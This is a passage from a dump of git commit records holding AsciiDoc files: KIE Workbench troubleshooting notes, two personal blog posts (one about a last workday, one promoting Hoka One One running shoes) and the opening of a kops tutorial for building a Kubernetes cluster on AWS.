Sent Events (SSE) used by the Workbench.\n\nThe issue results in the \"Loading...\" spinner remaining visible and the Workbench failing to materialize.\n\nThe workaround is to disable the Workbench's use of Server Sent Events by adding file `\/WEB-INF\/classes\/ErraiService.properties` to the exploded WAR containing the value ``errai.bus.enable_sse_support=false``.\nRe-package the WAR and re-deploy.\n\nSome users have also reported that disabling Server Sent Events does not resolve the issue. The solution found to work is to configure the JVM to use a different Entropy Gathering Device on Linux for `SecureRandom`. This can be configured by setting System Property `java.security.egd` to `file:\/dev\/.\/urandom`. See http:\/\/stackoverflow.com\/questions\/33166198\/kie-workbench-not-loading-after-login\/39110177#39110177[this] Stack Overflow post for details.\n\nPlease note, however, that this affects the JVM's random number generation and may present other challenges where strong cryptography is required. 
Configure with caution.\n\n=== Not able to clone KIE Workbench Git repository using ssh protocol.\nGit clients using ssh to interact with the Git server that is bundled with Workbench are authenticated and authorized to perform git commands by the security API that is part of the Uberfire backend server. When using an LDAP security realm, some git clients were not being authorized as expected. This was due to the fact that for non-web clients such as Git via ssh, the principal (i.e., user or group) name assigned to a user by the application server's user registry is the more complex DN associated with that principal by LDAP. The logic of the Uberfire backend server looked for an exact match of roles allowed with the principal name returned and therefore failed.\n\nIt is now possible to control the role-principal matching via the system property\n\n[source, property]\n----\norg.uberfire.ldap.regex.role_mapper\n----\n\nwhich takes as its value a Regex pattern to be applied when matching LDAP principal to role names. The pattern must contain the literal variable name 'role'. During authorization the variable is replaced by each of the allowed application roles. If the pattern is matched, the role is added to the user.\n\nFor instance, if the DN for the admin group in LDAP is\n\n[source, property]\n----\nDN: cn=admin,ou=groups,dc=example,dc=com\n----\n\nand its intended role is admin, then setting `org.uberfire.ldap.regex.role_mapper` with value\n\n[source, regex]\n----\ncn[\\\\ ]*=[\\\\ ]*role\n----\n\nwill find a match on role 'admin'.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b273e430d27f63f92e36ae013f96c3a157996fbd","subject":"Update 2015-02-13-the-last-day.adoc","message":"Update 2015-02-13-the-last-day.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-13-the-last-day.adoc","new_file":"_posts\/2015-02-13-the-last-day.adoc","new_contents":"= The Last Day\n:hp-alt-title: the last day\n:published_at: 2015-02-13\n:hp-tags: last, next, final, \n:hp-image: https:\/\/raw.githubusercontent.com\/senola\/pictures\/master\/background\/background1.jpg\n\nLast day of moving bricks, and once it is done I can go home for the New Year!!!!!\n\n\nThis past half month has really worn me out: no appetite and poor sleep.\n\n\nBeing away from home, I miss it badly, especially with the New Year so close. \n\n\nI want to see my hometown again, and the honest smiles of my relatives.\n\n\nThe one regret is that there is no year-end bonus this year \u256e(\u256f\u25bd\u2570)\u256d \n\n\nStill, I really like this job, and the people and things here.\n\n\nA new year and new challenges! Back to the fight after the holiday. Go go go!!!","old_contents":"= The Last Day\n:hp-alt-title: the last day\n:published_at: 2015-02-13\n:hp-tags: last, next, final \n:hp-image: https:\/\/raw.githubusercontent.com\/senola\/pictures\/master\/background\/background1.jpg\n\nLast day of moving bricks, and once it is done I can go home for the New Year!!!!!\n\n\nThis past half month has really worn me out: no appetite and poor sleep.\n\n\nBeing away from home, I miss it badly, especially with the New Year so close. \n\n\nI want to see my hometown again, and the honest smiles of my relatives.\n\n\nThe one regret is that there is no year-end bonus this year \u256e(\u256f\u25bd\u2570)\u256d \n\n\nStill, I really like this job, and the people and things here.\n\n\nA new year and new challenges! Back to the fight after the holiday. Go go go!!!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f526e7de22f4dfe3df4bac9affa7bd0797b918fa","subject":"Update 2015-11-11-Hoka-One-One.adoc","message":"Update 2015-11-11-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-11-Hoka-One-One.adoc","new_file":"_posts\/2015-11-11-Hoka-One-One.adoc","new_contents":"= Hoka One One\n:hp-image: https:\/\/cloud.githubusercontent.com\/assets\/19504323\/15452702\/48719838-202c-11e6-9c52-3d13d17bc909.jpg\n:published_at: 2015-11-11\n:hp-tags: Hoka, Hoka One One, Maximalist, running, running shoes, athletic shoes, cushioning, protection, overseas shopping, Amazon\n\nThe athletic shoe market is bewilderingly crowded, and the more choices there are, the harder it is to choose. Here I want to recommend one brand: Hoka One One.\n \nIt is a tiny niche brand, but its shoes are without question the most comfortable I have ever worn. I would say they outclass Asics, NB, Mizuno, Saucony and the rest of the top running shoe brands.\n \nSo what makes Hoka this strong?\n \nTrail races, triathlons, marathons, and even crueler ultra-endurance events keep turning up runners wearing Hoka One One. More and more podium finishers choose Hoka One One: a brand with only flagship-grade products, a brand whose every model can hold its own, a brand known as the Land Rover of running shoes. ...\n\n \nTwo years before barefoot running peaked, five-finger, barefoot-style, zero-drop, thin-soled shoes were all the rage. The back-to-nature idea was to rely on your own limbs for cushioning, and Adidas, Nike and New Balance were all led around by the nose by that trend when building running shoes.\n\n \n \nThe odd shoe that caught fire\n \nBut one small maker with a strange name, Hoka One One, went against the grain. In the heyday of barefoot running, it started plowing the field of thick-soled, heavily cushioned shoes.\n\n \nThe story goes that its founders went to China and had chemists develop a foam that was both lightweight and shock absorbing. Using it as a midsole, they produced big, plush super trail shoes: Land Rovers of the running shoe world.\n\n \nCompare one with any other running shoe and you can see how big and thick it is.\n\n\nHoka One One is Maori, roughly equivalent to \"To fly\"; loosely translated, \"do not hold me back, I am taking off.\"\n\n\nFor most trainers, the difference between the flagship and the second tier is just extra cushioning technology added to the flagship for heavier runners; the classic example is Asics' top-end Kayano versus the second-tier GT series.\n\nAsics GT-2000\n \nIn 2013, Hoka One One, sworn to push cushioning to the extreme, caught the eye of Deckers and was acquired. Deckers is also the parent company of UGG. You can guess what happened next.\n\nUGG soles reportedly use Hoka technology\n \nBack then Hoka One One had only 90 retail locations; after the acquisition these monster shoes took off quickly, reaching 1,200 locations within two years.\n\n \n \nSoft as running on Baymax\nHoka One One is single-minded about thick running shoes. Wearing them feels like standing on sponge cake, which makes them ideal for ultra marathons and other events of a hundred kilometers or more.\n\n\nFor runs long enough to push you toward your limit, Hoka One One delivers unmatched comfort.\n\n\nBesides road products aimed at marathons, Hoka One One also develops trail series that let you romp over hills and ridges.\n\n\nIn fact, the earliest products were built precisely for descents, the kind of running that punishes knees.\n\n\nA light pair of Hokas can ride in your pack; switch into them for the downhill and stop worrying about your knees.\n\n\nImagine running on Baymax.\n\n\nShoes this good predictably climbed the major running shoe rankings, and they appear regularly in the famous Runner's World recommendation lists.\n\n \nFor example, the Hoka One One Tracer is one of the lightest shoes in this year's spring recommendations.\n\nHoka One One Tracer\n \nEvery year Runner's World gathers hundreds of testers across the US to test shoes and score them fairly and objectively, then combines the scores with real-world feel into recommendations.\n\n\nWhen I saw Runner's World's test scores for the Hoka One One Conquest road shoe, a shiver ran through me; my friends and I were stunned!\n\n \nForefoot cushioning, heel cushioning, and stiffness scores almost all maxed out. Is this shoemaking, or are they building a flying nimbus cloud?\n\n \n \n \n \nShoe tech I would give full marks\nNo.1 | Midsole technology\n \nThe midsole foam is about 30% less dense than a conventional shoe's, but Hoka uses roughly 1.5 times as much of it.\n\n \nHigh rebound and ground feedback give runners extra spring. With one more layer of soft cushioning than an ordinary shoe, it can absorb roughly 80% of impact forces.\n\n \n \nNo.2 | Rocker (boat) geometry\n \nHoka One One shapes the sole like a boat, with two typical stack combinations: a 35mm heel with a 31mm forefoot, and a 30mm heel with a 24mm forefoot (that is, heel-to-toe drops of only 4mm and 6mm despite the tall stack).\n\n\nThis geometry gives a particularly smooth ride, like rolling forward on a rocking chair: relaxed, efficient running that can take roughly 20% of the pressure off the knees.\n\n \n \nNo.3 | RMAT midsole\n\nRMAT is Hoka's newest technology, combining springiness with durability while also helping the outsole grip. It is about 30% lighter than a typical EVA midsole, and softer, with better cushioning.\n\n \nThis midsole lets your foot control the shoe better, so you can run faster, easier, and safer on different terrain.\n\n \n \nNo.4 | Reinforced outsole\n\nHoka One One adds about 50% more outsole than an ordinary shoe. To match such a thick midsole, the outsole uses extensive grooves and lugs for traction, while different zones of the sole keep it flexible without sacrificing stability. Even so, the outsole's wear resistance is not outstanding, and it wears down easily.\n\n \n \nNo.5 | Speed insoles\n\nMany models ship with two sets of insoles: a molded speed insole and a flat cut insole. The speed insole uses a three-layer lamination to hold the foot more securely and keep it in close contact with the midsole for the best feel.\n\n \nThe cut insole uses OrthoLite material: lightweight and odor resistant. When your feet swell on long efforts, you can swap to the thinner cut insole for a roomier fit.\n\n \n \nNo.6 | Quick lacing\n\nLikewise, many models come with both a speed-lace system and ordinary laces: one push and one pull and you are laced up, which is handy for changing shoes or socks mid-event. You can of course swap in the ordinary laces and tie them more firmly.\n\n\nThe shoe also has a widened lace keeper that adds wrap and holds the laces in place.\n\n \n \nNo.7 | Microfiber tongue\n\nThe tongue is made of a soft, breathable microfiber, and vent holes in the tongue help keep the shoe ventilated.\n\n \n \n \nWhich Hoka One One to buy\nWhich shoe suits you best? Different battles call for different weapons; they fall roughly into these 4 categories:\n \nNotes:\n1. Click a picture for the US price; for purchasing assistance contact WeChat kk794388 for favorable pricing\n2. One model may come in many color\/size combinations; click through to check, as pictures are for reference only\n3. For choosing US shoe sizes, see the overseas shoe sizing guide\n \n \nAll-terrain trail shoes: for every terrain and road condition, with maximal cushioning and protection, excellent go-anywhere capability, and unrivalled comfort in long endurance races, clearly lifting runners' stamina and results. The ATR trail line has long been loved by entry-level trail runners and ultra-trail masters alike.\n \n\n \n \nLightweight trail shoes: built for speed and for competition-level masters, with maximal cushioning at less than road-shoe weight; an absolutely elite downhill weapon. It is no accident that athletes wearing Hoka One One keep climbing onto race podiums.\n\n \n \n \n \nTrail\/road hybrid shoes: for urban trail running, covering daily easy training while still handling hill runs. The difference from the all-terrain trail shoes is that the hybrid outsole is not only better suited to flying along paved surfaces but also wears better on them. It does, however, give up some performance to the all-terrain shoes on technical trail sections.\n\n \n \n \nLong-distance road shoes: for marathons and long road runs, with maximal cushioning in a lightweight design. From entry-level runners to marathoners chasing every second, nobody turns down a running weapon that is lightweight yet loses nothing in cushioning and rebound.\n\n \n \n \n \n \n \n \n \n \nReferences:\n- Wikipedia\n- Sole Man: The Story Behind Hoka Shoes\n\n\n\n\n\n","old_contents":"= Hoka One One\n:hp-image: https:\/\/cloud.githubusercontent.com\/assets\/19504323\/15452702\/48719838-202c-11e6-9c52-3d13d17bc909.jpg\n:published_at: 2015-11-11\n:hp-tags: Hoka, Hoka One One, Maximalist, running, running shoes, athletic shoes, cushioning, protection, overseas shopping, Amazon,\n\nThe athletic shoe market is bewilderingly crowded, and the more choices there are, the harder it is to choose. Here I want to recommend one brand: Hoka One One.\n \nIt is a tiny niche brand, but its shoes are without question the most comfortable I have ever worn. I would say they outclass Asics, NB, Mizuno, Saucony and the rest of the top running shoe brands.\n \nSo what makes Hoka this strong?\n \nTrail races, triathlons, marathons, and even crueler ultra-endurance events keep turning up runners wearing Hoka One One. More and more podium finishers choose Hoka One One: a brand with only flagship-grade products, a brand whose every model can hold its own, a brand known as the Land Rover of running shoes. ...\n\n \nTwo years before barefoot running peaked, five-finger, barefoot-style, zero-drop, thin-soled shoes were all the rage. The back-to-nature idea was to rely on your own limbs for cushioning, and Adidas, Nike and New Balance were all led around by the nose by that trend when building running shoes.\n\n \n \nThe odd shoe that caught fire\n \nBut one small maker with a strange name, Hoka One One, went against the grain. In the heyday of barefoot running, it started plowing the field of thick-soled, heavily cushioned shoes.\n\n \nThe story goes that its founders went to China and had chemists develop a foam that was both lightweight and shock absorbing. Using it as a midsole, they produced big, plush super trail shoes: Land Rovers of the running shoe world.\n\n \nCompare one with any other running shoe and you can see how big and thick it is.\n\n\nHoka One One is Maori, roughly equivalent to \"To fly\"; loosely translated, \"do not hold me back, I am taking off.\"\n\n\nFor most trainers, the difference between the flagship and the second tier is just extra cushioning technology added to the flagship for heavier runners; the classic example is Asics' top-end Kayano versus the second-tier GT series.\n\nAsics GT-2000\n \nIn 2013, Hoka One One, sworn to push cushioning to the extreme, caught the eye of Deckers and was acquired. Deckers is also the parent company of UGG. You can guess what happened next.\n\nUGG soles reportedly use Hoka technology\n \nBack then Hoka One One had only 90 retail locations; after the acquisition these monster shoes took off quickly, reaching 1,200 locations within two years.\n\n \n \nSoft as running on Baymax\nHoka One One is single-minded about thick running shoes. Wearing them feels like standing on sponge cake, which makes them ideal for ultra marathons and other events of a hundred kilometers or more.\n\n\nFor runs long enough to push you toward your limit, Hoka One One delivers unmatched comfort.\n\n\nBesides road products aimed at marathons, Hoka One One also develops trail series that let you romp over hills and ridges.\n\n\nIn fact, the earliest products were built precisely for descents, the kind of running that punishes knees.\n\n\nA light pair of Hokas can ride in your pack; switch into them for the downhill and stop worrying about your knees.\n\n\nImagine running on Baymax.\n\n\nShoes this good predictably climbed the major running shoe rankings, and they appear regularly in the famous Runner's World recommendation lists.\n\n \nFor example, the Hoka One One Tracer is one of the lightest shoes in this year's spring recommendations.\n\nHoka One One Tracer\n \nEvery year Runner's World gathers hundreds of testers across the US to test shoes and score them fairly and objectively, then combines the scores with real-world feel into recommendations.\n\n\nWhen I saw Runner's World's test scores for the Hoka One One Conquest road shoe, a shiver ran through me; my friends and I were stunned!\n\n \nForefoot cushioning, heel cushioning, and stiffness scores almost all maxed out. Is this shoemaking, or are they building a flying nimbus cloud?\n\n \n \n \n \nShoe tech I would give full marks\nNo.1 | Midsole technology\n \nThe midsole foam is about 30% less dense than a conventional shoe's, but Hoka uses roughly 1.5 times as much of it.\n\n \nHigh rebound and ground feedback give runners extra spring. With one more layer of soft cushioning than an ordinary shoe, it can absorb roughly 80% of impact forces.\n\n \n \nNo.2 | Rocker (boat) geometry\n \nHoka One One shapes the sole like a boat, with two typical stack combinations: a 35mm heel with a 31mm forefoot; and a 30mm heel with a forefoot of 
24mm\u3002\n\n\n\u8fd9\u79cd\u9ad8\u5ea6\u5dee\u80fd\u591f\u7ed9\u8dd1\u8005\u5e26\u6765\u7279\u522b\u6d41\u7545\u7684\u8dd1\u6b65\u611f\u53d7\uff0c\u5c31\u50cf\u8e29\u7740\u6447\u6905\u4e00\u6837\uff0c\u8dd1\u8d77\u6765\u8f7b\u677e\u7701\u529b\uff0c\u80fd\u591f\u51cf\u8f7b 20% \u7684\u819d\u76d6\u538b\u529b\u3002\n\n \n \nNo.3\uff5cRMAT \u4e2d\u5e95\n\nRMAT \u6280\u672f\u662f Hoka \u5bb6\u7684\u6700\u65b0\u7684\u6280\u672f\uff0c\u5c06\u5f39\u6027\u548c\u575a\u56fa\u6027\u76f8\u7ed3\u5408\uff0c\u540c\u65f6\u8fd8\u80fd\u914d\u5408\u5927\u5e95\u63d0\u4f9b\u4e00\u5b9a\u7684\u6293\u5730\u6027\u80fd\u3002\u6bd4\u4e00\u822c EVA \u6280\u672f\u4e2d\u5e95\u8f7b 30%\u3002\u800c\u4e14\u66f4\u8f6f\u7f13\u51b2\u66f4\u597d\u3002\n\n \n\u6709\u4e86\u8fd9\u4e2a\u4e2d\u5e95\u80fd\u591f\u8ba9\u4f60\u811a\u80fd\u66f4\u597d\u7684\u63a7\u5236\u8dd1\u978b\uff0c\u80fd\u5728\u4e0d\u540c\u5730\u5f62\u8dd1\u7684\u66f4\u5feb\uff0c\u66f4\u8f7b\u677e\uff0c\u66f4\u5b89\u5168\u3002\n\n \n \nNo.4\uff5c\u589e\u5f3a\u5916\u5e95\n\nHoka OneOne \u6bd4\u5e73\u5e38\u7684\u978b\u591a\u52a0\u4e86 50% \u7684\u5916\u5e95\uff0c\u9488\u5bf9\u5982\u6b64\u539a\u7684\u4e2d\u5e95\uff0c\u5927\u5e95\u91c7\u7528\u4e86\u5927\u91cf\u6c9f\u58d1\u51f9\u51f8\u8bbe\u8ba1\uff0c\u6765\u63d0\u9ad8\u6293\u5730\u529b\u3002\u540c\u65f6\u978b\u5e95\u7684\u4e0d\u540c\u5206\u533a\uff0c\u4fdd\u8bc1\u7075\u6d3b\u7684\u540c\u65f6\u4e0d\u727a\u7272\u7a33\u5b9a\u6027\u3002\u4e0d\u8fc7\u5373\u4fbf\u5982\u6b64\uff0c\u5916\u5730\u7684\u6297\u78e8\u635f\u6027\u80fd\u4e5f\u4e0d\u662f\u7279\u522b\u597d\uff0c\u5bb9\u6613\u6d88\u8017\u3002\n\n \n \nNo.5\uff5c\u901f\u5ea6\u978b\u57ab\n\n\u8bb8\u591a\u6b3e\u8dd1\u978b\u90fd\u63d0\u4f9b\u4e86\u4e24\u7ec4\u978b\u57ab\uff0c\u5851\u5f62\u7684\u901f\u5ea6\u978b\u57ab\u548c\u88c1\u65ad\u978b\u57ab\u3002\u901f\u5ea6\u978b\u57ab\u91c7\u75283\u5c42\u63a5\u5408\u6280\u672f\u8ba9\u978b\u57ab\u4fdd\u62a4\u811a\u66f4\u5b89\u5168\u3002\u5e76\u8ba9\u811a\u638c\u66f4\u52a0\u8d34\u5408\u4e2d\u5e95\uff0c\u4fdd\u8bc1\u6700\u4f73\u811a\u611f\u3002\n\n \n\u88c1\u65ad\u978b\u57ab\u4f7f\u7528\u4e86\u201cOrthoLite\"\u79d1\u6280\uff0c\u8f7b\u91cf\u3001\u9632\u81ed\u3002\u5728\u957f\u9014\u8fd0\u52a8\u811a\u53d8\u80bf\u80c0\u4e4b\u540e\uff0c\u53ef\u4ee5\u6362\u66f4\u8f7b\u8584\u7684\u88c1\u65ad\u978b\u57ab\uff0c\u53ef\u4ee5\u63d0\u9ad8\u66f4\u5bbd\u655e\u7684\u978b\u5185\u7a7a\u95f4\u3002\n\n \n \nNo.6\uff5c\u5feb\u901f\u978b\u5e26\n\n\u540c\u6837\uff0c\u591a\u6b3e\u8dd1\u978b\u4e5f\u914d\u5907\u4e86\u5feb\u901f\u978b\u5e26\u7cfb\u7edf\u548c\u666e\u901a\u978b\u5e26\uff0c\u4e00\u6309\u4e00\u62c9\u5c31\u53ef\u4ee5\u7cfb\u4e0a\u978b\u5e26\u3002\u65b9\u4fbf\u5728\u8fd0\u52a8\u65f6\u6362\u978b\u6216\u8005\u6362\u889c\u5b50\u3002\u5f53\u7136\uff0c\u4f60\u4e5f\u53ef\u4ee5\u6362\u4e0a\u666e\u901a\u978b\u5e26\uff0c\u628a\u978b\u5e26\u7cfb\u7684\u66f4\u7ed3\u5b9e\u3002\n\n\n\u5e76\u4e14\u978b\u5b50\u4e0a\u6709\u52a0\u5bbd\u7684\u56fa\u5b9a\u978b\u53e3\uff0c\u63d0\u4f9b\u5305\u88f9\u6027\u4e4b\u5916\uff0c\u8fd8\u80fd\u56fa\u5b9a\u978b\u5e26\u3002\n\n \n \nNo.7\uff5c\u201c\u8d85\u7ea4\u201d\u6750\u6599\u978b\u820c\n\n\u978b\u820c\u91c7\u7528\u4e86\u201c\u8d85\u7ea4\u201d\u6750\u6599\u5236\u6210\uff0c\u8fd9\u79cd\u6750\u6599\u900f\u6c14\u67d4\u8f6f\uff0c\u5e76\u4e14\u5728\u978b\u820c\u4e0a\u7684\u900f\u6c14\u5b54\uff0c\u53ef\u4ee5\u4fdd\u8bc1\u978b\u5b50\u7684\u900f\u6c14\u6027\u3002\n\n \n \n \n\u8be5\u4e70\u54ea\u6b3eHoka One 
One\n\u54ea\u79cd\u978b\u5b50\u66f4\u9002\u5408\u4f60\uff1f\u4e0d\u540c\u7684\u6218\u51b5\uff0c\u91c7\u53d6\u4e0d\u540c\u7684\u5175\u5203\uff0c\u5927\u4f53\u4ee5\u5206\u8fd94\u7c7b\uff1a\n \n\u6ce8\uff1a\n1. \u70b9\u56fe\u7247\u53ef\u770b\u7f8e\u56fd\u4ef7\u683c\uff0c\u5982\u9700\u4ee3\u8d2d\u8bf7\u8054\u7cfb\u5fae\u4fe1kk794388\uff0c\u4ef7\u683c\u4ece\u4f18\n2. \u4e00\u6b3e\u978b\u5b50\u53ef\u80fd\u6709\u5f88\u591a\u79cd\u989c\u8272\/\u5c3a\u5bf8\u7ec4\u5408\uff0c\u9700\u70b9\u5165\u67e5\u770b\uff0c\u56fe\u7247\u53ea\u4f9b\u53c2\u8003\n3. \u5173\u4e8e\u7f8e\u56fd\u978b\u7801\u7684\u9009\u62e9\uff0c\u8bf7\u53c2\u8003\u6d77\u6dd8\u978b\u5b50\u5c3a\u7801\n \n \n\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u6240\u6709\u5730\u5f62\u548c\u4e0d\u540c\u8def\u51b5\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\u548c\u4fdd\u62a4\uff0c\u4f18\u5f02\u7684\u901a\u8fc7\u6027\uff0c\u5728\u957f\u8ddd\u79bb\u8010\u529b\u8d5b\u4e2d\uff0c\u65e0\u4e0e\u4f26\u6bd4\u7684\u8212\u9002\u6027\uff0c\u660e\u663e\u63d0\u5347\u4e86\u8dd1\u8005\u7684\u8010\u529b\u548c\u6210\u7ee9\u3002ATR\u7cfb\u8d8a\u91ce\u8dd1\u978b\uff0c\u4e00\u76f4\u53d7\u5165\u95e8\u7ea7\u8d8a\u91ce\u8dd1\u8005\u548c\u8d85\u7ea7\u8d8a\u91ce\u8d5b\u5927\u795e\u7684\u8ffd\u6367\u3002\n \n\n \n \n\u8f7b\u91cf\u5316\u8d8a\u91ce\u8dd1\u978b\uff0c\u9762\u5411\u8ffd\u6c42\u901f\u5ea6\u548c\u7ade\u6280\u7ea7\u5927\u795e\u7684\u4ea7\u7269\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u6bd4\u8def\u8dd1\u978b\u8fd8\u8f7b\u7684\u91cd\u91cf\uff0c\u7edd\u5bf9\u662f\u5927\u795e\u7ea7\u7684\u4e0b\u5761\u795e\u5668\u3002\u7a7f\u7740Hoka One One\u7684\u5927\u795e\u4e00\u6b21\u53c8\u4e00\u6b21\u767b\u4e0a\u5404\u5927\u8d5b\u4e8b\u7684\u9886\u5956\u53f0\u7edd\u975e\u5076\u7136\u3002\n\n \n \n \n \n\u8d8a\u91ce\u8dd1\/\u8def\u8dd1\u4e24\u7528\u8dd1\u978b\uff0c\u9762\u5411\u57ce\u5e02\u8d8a\u91ce\u8dd1\uff0c\u65e2\u6ee1\u8db3\u65e5\u5e38\u6162\u8dd1\u8bad\u7ec3\u9700\u8981\uff0c\u53c8\u80fd\u4e0a\u5c71\u5954\u8dd1\u3002\u4e0e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u7684\u533a\u522b\u5728\u4e8e\uff0c\u4e24\u7528\u8dd1\u978b\u7684\u978b\u5e95\u4e0d\u4ec5\u66f4\u9002\u5408\u5728\u786c\u5316\u8def\u9762\u98de\u5954\uff0c\u800c\u4e14\u5728\u786c\u5316\u8def\u9762\u4e0a\u7684\u8010\u78e8\u8868\u73b0\u66f4\u4f18\u79c0\u3002\u4e0d\u8fc7\u5728\u590d\u6742\u8d8a\u91ce\u6280\u672f\u8def\u6bb5\u4e0a\u7684\u8868\u73b0\u4f1a\u900a\u8272\u4e8e\u5168\u5730\u5f62\u8d8a\u91ce\u8dd1\u978b\u3002\n\n \n \n \n\u957f\u8ddd\u79bb\u516c\u8def\u8dd1\u978b\uff0c\u9762\u5411\u957f\u8ddd\u79bb\u7684\u9a6c\u62c9\u677e\u548c\u8def\u8dd1\uff0c\u6700\u5927\u5316\u7684\u7f13\u51b2\uff0c\u8f7b\u91cf\u5316\u8bbe\u8ba1\uff0c\u65e0\u8bba\u662f\u5165\u95e8\u7ea7\u8dd1\u8005\uff0c\u8fd8\u662f\u4e89\u5206\u593a\u79d2\u7684\u9a6c\u62c9\u677e\u8fbe\u4eba\uff0c\u90fd\u4e0d\u4f1a\u62d2\u7edd\u65e2\u8f7b\u91cf\u5316\uff0c\u53c8\u4e0d\u5931\u7f13\u51b2\u548c\u56de\u5f39\u529b\u5f3a\u7684\u8dd1\u6b65\u795e\u5668\u3002\n\n \n \n \n \n \n \n \n \n \n\u53c2\u8003\uff1a\n- Wikipedia\n- Sole Man: The Story Behind Hoka Shoes\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"37b820008a1b0a39ae949ca1d9f81c35c2b838af","subject":"Inline images (3)","message":"Inline images 
(3)\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"01-path-basics\/102-your-first-cluster\/readme.adoc","new_file":"01-path-basics\/102-your-first-cluster\/readme.adoc","new_contents":"= Create A Kubernetes Cluster Using kops\n:toc:\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n\nThis tutorial will walk you through how to install a Kubernetes cluster on AWS using kops.\n\nhttps:\/\/github.com\/kubernetes\/kops[kops], short for Kubernetes Operations, is a set of tools for installing, operating, and deleting Kubernetes clusters. kops can also perform rolling upgrades from older versions of Kubernetes to newer ones. kops also manages the cluster add-ons. After the cluster is created, the link:..\/prereqs.adoc[Kubernetes CLI] can be used to manage resources in the cluster. If you have not gone through the link:..\/prereqs.adoc[Prerequisites] section, please do so now before continuing.\n\nIf you have not set up the link:..\/101-start-here[Cloud9 Devlopment Environment] yet, please do so before continuing.\n\n== Create A Cluster with kops\n\nThe kops CLI can be used to create a highly available cluster, with multiple master nodes spread across multiple Availability Zones. Workers can be spread across multiple zones as well. Some of the tasks that happen behind the scene during cluster creation are:\n\n- Provisioning EC2 instances\n- Creating and configuring AWS resources such as a VPC, Auto Scaling Groups, IAM users, and security groups\n- Installing Kubernetes\n- If required configuring Route53 DNS\n\nWhen setting up a cluster you have two options on how the nodes in the cluster communicate:\n\n. <<create-a-gossip-based-kubernetes-cluster-with-kops, Using the gossip protocol>> - kops has support for a gossip-based cluster. This does not require a domain, subdomain, or Route53 hosted zone to be registered. A gossip-based cluster is therefore easier and quicker to setup, and is the preferred method for creating a cluster for use with this workshop.\n. <<appendix-create-a-dns-based-kubernetes-cluster, Using DNS>> - Creating a Kubernetes cluster that uses DNS for node discovery requires your own domain (or subdomain) and setting up Route 53 hosted zones. This allows the various Kubernetes components to use DNS resolutions find and communicate with each other, and for kubectl to be able to talk directly with the master node(s).\n\nInstructions for creating a gossip-based cluster are provided below, however, the examples in the workshop should work with either option. Instructions for creating a DNS-based cluster are provided as an appendix at the bottom of this page.\n\n=== Create a Gossip Based Kubernetes Cluster with kops\n\nkops supports creating a gossip-based cluster, which uses https:\/\/github.com\/weaveworks\/mesh[Weave Mesh] behind the scenes. This makes the process of creating a Kubernetes cluster using kops DNS-free, and therefore much simpler. This also means a top-level domain or a subdomain is no longer required to create the cluster. To create a cluster using the gossip protocol, indicate this to by using a cluster name with a suffix of `.k8s.local`. In the following steps, we will use example.cluster.k8s.local as a sample gossip cluster name. 
You may choose a different name as long as it ends with `.k8s.local`.\n\nInformation on setting up a DNS-based cluster can be found at the bottom of this page in the Appendix. However, setting up a gossip-based cluster allows you to get started quickly.\n\nWe show two examples of creating gossip-based clusters below. You can choose whether to create a single-master or multi-master cluster. Most workshop exercises will work on both types of cluster, however some modules require using a multi-master cluster (to demonstrate rolling updates, for instance.) If you aren't sure, please create a <<multi-master-multi-node-multi-az-gossip-based-cluster, multi-master cluster.>>\n\n==== Default Gossip Based Cluster\n\nBy default, `create cluster` command creates a single master node and two worker nodes in the specified zones.\n\nCreate a Kubernetes cluster using the following command. This will create a cluster with a single master, multi-node and multi-az configuration:\n\n $ kops create cluster \\\n --name example.cluster.k8s.local \\\n --zones $AWS_AVAILABILITY_ZONES \\\n --yes\n\nThe `AWS_AVAILABILITY_ZONES` environment variable should have been set during the link:..\/101-start-here[Cloud9 Environment Setup].\n\nThe `create cluster` command only creates and stores the cluster config in the S3 bucket. Adding the `--yes` flag ensures that the cluster is immediately created as well.\n\nAlternatively, you may not specify the `--yes` flag as part of the `kops create cluster` command. Then you can use `kops edit cluster example.cluster.k8s.local` command to view the current cluster state and make changes. The cluster creation, in that case, is started with the following command:\n\n $ kops update cluster example.cluster.k8s.local --yes\n\nOnce the `kops create cluster` command is issued, it provisions the EC2 instances, sets up Auto Scaling Groups, IAM users, Security Groups, installs Kubernetes on each node, then configures the master and worker nodes. This process can take some time based upon the number of master and worker nodes.\n\nNote: If your 'create cluster' fails with an error like:\n```\nerror reading s3:\/\/example-kops-state-store-workshop\/workshop-prep.cluster.k8s.local\/config: Unable to list AWS regions: NoCredentialProviders: no valid providers in chain\ncaused by: EnvAccessKeyNotFound: failed to find credentials in the environment.\"\n```\n, try setting the following environment variables before executing the 'create cluster' command:\n```\nexport AWS_DEFAULT_PROFILE=<your_aws_credentials_profile_name>\nexport AWS_SDK_LOAD_CONFIG=1\n```\n\nWait for 5-8 minutes and then the cluster can be validated as shown:\n\n```\n$ kops validate cluster\nUsing cluster from kubectl context: example.cluster.k8s.local\n\nValidating cluster example.cluster.k8s.local\n\nINSTANCE GROUPS\nNAME ROLE MACHINETYPE MIN MAX SUBNETS\nmaster-eu-central-1a Master m3.medium 1 1 eu-central-1a\nnodes Node t2.medium 2 2 eu-central-1a,eu-central-1b\n\nNODE STATUS\nNAME ROLE READY\nip-172-20-57-94.ec2.internal master True\nip-172-20-63-55.ec2.internal node True\nip-172-20-75-78.ec2.internal node True\n\nYour cluster example.cluster.k8s.local is ready\n```\n==== Multi-master, multi-node, multi-az Gossip Based Cluster\n\nCreate a cluster with multi-master, multi-node and multi-az 